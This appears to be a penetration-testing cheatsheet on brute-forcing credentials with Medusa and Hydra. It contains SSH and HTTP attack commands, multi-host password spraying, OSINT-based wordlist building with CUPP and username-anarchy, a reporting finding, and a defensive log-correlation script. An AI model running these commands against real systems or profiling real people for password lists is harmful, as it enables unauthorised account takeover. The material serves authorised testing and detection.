🛡️ Methodology Checklist
- Medusa SSH: medusa -h [TARGET] -u [USER] -P [WORDLIST] -M ssh
- Medusa HTTP Basic: medusa -h [TARGET] -u admin -P [WORDLIST] -M http
- Custom script: identify any login form not covered by tools
- Parse response codes and text to confirm success condition
- Respect rate limits and lockout policies during brute-force
- Combine with valid username list for efficiency
🎯 Operational Context
Use when: Hydra fails or target requires custom module — Medusa handles parallel multi-host attacks and supports custom credential testing modules.
Think Dumber First: Medusa is better than Hydra for multi-host parallel spraying. medusa -H targets.txt -U users.txt -P pass.txt -M ssh -t 5 attacks all targets simultaneously. Use -n [PORT] for non-standard ports.
Skip when: Single-target attack where Hydra works — Medusa adds complexity with no benefit for simple cases.
⚡ Tactical Cheatsheet
| Command | Tactical Outcome |
|---|---|
| medusa -h [TARGET_IP] -U [USERLIST] -P [PASSLIST] -M ssh | SSH brute force |
| medusa -h [TARGET_IP] -n [PORT] -U [USERLIST] -P [PASSLIST] -M ssh -t 3 | SSH on non-standard port (-n, NOT -s) |
| medusa -H [TARGETS] -U [USERLIST] -P [PASSLIST] -M http -m GET | Multi-host HTTP Basic Auth |
| medusa -h [TARGET_IP] -U [USERLIST] -e ns -M [MODULE] | Quick check: null password (n) and user=pass (s) |
| medusa -h [TARGET_IP] -n [PORT] -u [USER] -P [PASSLIST] -M [MODULE] -t [THREADS] | Throttled single-user attack |
| ./username-anarchy [FIRST] [LAST] > usernames.txt | Generate corporate username permutations |
| cupp -i | Interactive OSINT-based password profiler |
| grep -E '^.{6,}$' cupp.txt \| grep -E '[A-Z]' \| grep -E '[a-z]' \| grep -E '[0-9]' \| grep -E '([!@#$%^&*].*){2,}' > filtered.txt | Filter CUPP output to password policy |
| grep -E '^.{8,}$' wordlist.txt \| grep -E '[A-Z]' \| grep -E '[a-z]' \| grep -E '[0-9]' > policy_list.txt | Filter any wordlist to min-length + complexity |
🔬 Deep Dive & Workflow
Medusa vs Hydra — Key Differences
| Feature | Hydra | Medusa |
|---|---|---|
| Port flag | -s | -n |
| Module flag | positional (e.g., ssh at end) | -M ssh (required) |
| Stop on success | -f | -f (host) or -F (all) |
| Verbosity | -V | -v 4 to -v 6 |
| Lower case flags | single string | single string |
| Upper case flags | file path | file path |
Custom Wordlist Generation
Username Anarchy (corporate naming conventions):
```bash
sudo apt install ruby -y
git clone https://github.com/urbanadventurer/username-anarchy.git
cd username-anarchy
./username-anarchy Jane Smith > jane_usernames.txt
# Generates: jsmith, jane.s, smithj, j.smith, janes, etc.
```
CUPP (OSINT-based password profiling):
```bash
sudo apt install cupp -y
cupp -i
# Prompts for: First/Last name, nickname, birthdate, partner, pet, company, keywords
# Answer 'y' to special chars, numbers, leetspeak
# Output: jane.txt
```
OSINT sources: LinkedIn, Facebook, "About Us" pages, PDFs/DOCX from enumeration.
Policy filtering (apply after CUPP generation):
```bash
# Example: min 6 chars, upper, lower, digit, 2 special chars
grep -E '^.{6,}$' jane.txt \
| grep -E '[A-Z]' \
| grep -E '[a-z]' \
| grep -E '[0-9]' \
| grep -E '([!@#$%^&*].*){2,}' > filtered.txt
```
Full targeted workflow:
```bash
./username-anarchy Jane Smith > usernames.txt
cupp -i # → jane.txt
grep -E '^.{6,}$' jane.txt | grep -E '[A-Z]' | grep -E '[a-z]' \
| grep -E '[0-9]' | grep -E '([!@#$%^&*].*){2,}' > passwords.txt
hydra -L usernames.txt -P passwords.txt -f 10.10.10.5 -s 8080 \
http-post-form "/:username=^USER^&password=^PASS^:F=Invalid credentials"
```
Key Traps
- Medusa port is -n, not -s — memorize this, it's the #1 gotcha vs Hydra
- Run username-anarchy from a user-owned directory; sudo ./... into /root/ fails (the output redirect is opened by your unprivileged shell, so the write is denied before the script runs)
- CUPP "key words" prompt — add company names and project names found during recon
🛠️ Troubleshooting & Edge Cases
| Problem | Cause | Fix |
|---|---|---|
| Medusa not installed | Not on system | Install: apt install medusa or compile from source; or use nxc as alternative for SMB/WinRM |
| Medusa module not found | Wrong module name | List modules: medusa -d; module names differ from Hydra (e.g., smbnt not smb) |
| Multi-host attack too fast | Triggering lockout | Set parallel hosts: -T 1 (1 host at a time); threads per host: -t 2 |
| Custom HTTP module config wrong | Web form structure differs | Use -m DIR:/login:user=^USER^&pass=^PASS^:S=Welcome format; test response string |
| Medusa hangs indefinitely | Target unresponsive | Add timeout: -r 3 (3 retries); -f to stop after first success per host |
📝 Reporting Trigger
Finding Title: Parallel Credential Brute Force Across Multiple Hosts
Impact: Multi-host parallel brute force efficiently tests credentials across all identified targets simultaneously, compressing the time required to identify valid credentials from hours to minutes across large environments.
Root Cause: No centralized authentication monitoring to detect distributed brute force attacks across multiple hosts. Individual host lockout policies without cross-host correlation.
Recommendation: Implement SIEM correlation for distributed authentication failure patterns. Deploy centralized authentication (AD/RADIUS) with unified lockout policies. Network-level rate limiting at the perimeter for authentication protocols.
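As an added defender-side example (not part of the original cheatsheet), here is the cross-host correlation the recommendation above calls for, run over constructed sshd log lines: it flags a source address that fails logins on several distinct hosts within a short window even though each host alone saw only one or two failures, which a per-host lockout threshold never reaches. Hostnames, addresses, the window and the host threshold are all constructed assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample sshd/syslog lines; the hostname field is the host that logged the event.
SAMPLE_LOGS = """\
Mar 10 12:00:01 web01 sshd[1201]: Failed password for admin from 203.0.113.7 port 51012 ssh2
Mar 10 12:00:02 web02 sshd[2201]: Failed password for admin from 203.0.113.7 port 51013 ssh2
Mar 10 12:00:02 db01 sshd[3301]: Failed password for invalid user backup from 203.0.113.7 port 51014 ssh2
Mar 10 12:00:03 app01 sshd[4401]: Failed password for admin from 203.0.113.7 port 51015 ssh2
Mar 10 12:00:05 web01 sshd[1202]: Failed password for alice from 198.51.100.20 port 40001 ssh2
Mar 10 12:00:09 web01 sshd[1203]: Accepted password for alice from 198.51.100.20 port 40002 ssh2
Mar 10 12:30:00 db01 sshd[3302]: Failed password for root from 203.0.113.7 port 51020 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3} +\d{1,2} \d{2}:\d{2}:\d{2}) (?P<host>\S+) sshd\[\d+\]: "
    r"Failed password for (?:invalid user )?(?P<user>\S+) from (?P<src>\S+) port \d+"
)

def parse_failures(text, year=2024):
    """Return (timestamp, host, user, src) tuples for failed SSH logins only."""
    out = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # accepted logins and unrelated lines are ignored
        ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        out.append((ts, m["host"], m["user"], m["src"]))
    return out

def distributed_bruteforce(events, window_s=300, min_hosts=3):
    """Flag each source IP with failures on >= min_hosts distinct hosts inside a window_s window."""
    by_src = defaultdict(list)
    for ts, host, user, src in events:
        by_src[src].append((ts, host, user))
    alerts = {}
    for src, evs in by_src.items():
        evs.sort()
        for i, (start, _, _) in enumerate(evs):  # slide the window over each failure as its start
            in_win = [e for e in evs[i:] if (e[0] - start).total_seconds() <= window_s]
            hosts = {h for _, h, _ in in_win}
            if len(hosts) >= min_hosts:
                alerts[src] = {"hosts": sorted(hosts),
                               "users": sorted({u for _, _, u in in_win}),
                               "first_seen": start}
                break
    return alerts

if __name__ == "__main__":
    print(distributed_bruteforce(parse_failures(SAMPLE_LOGS)))
```

Feeding the same logic with per-host counts only would miss the first source entirely, since no single host saw more than two failures.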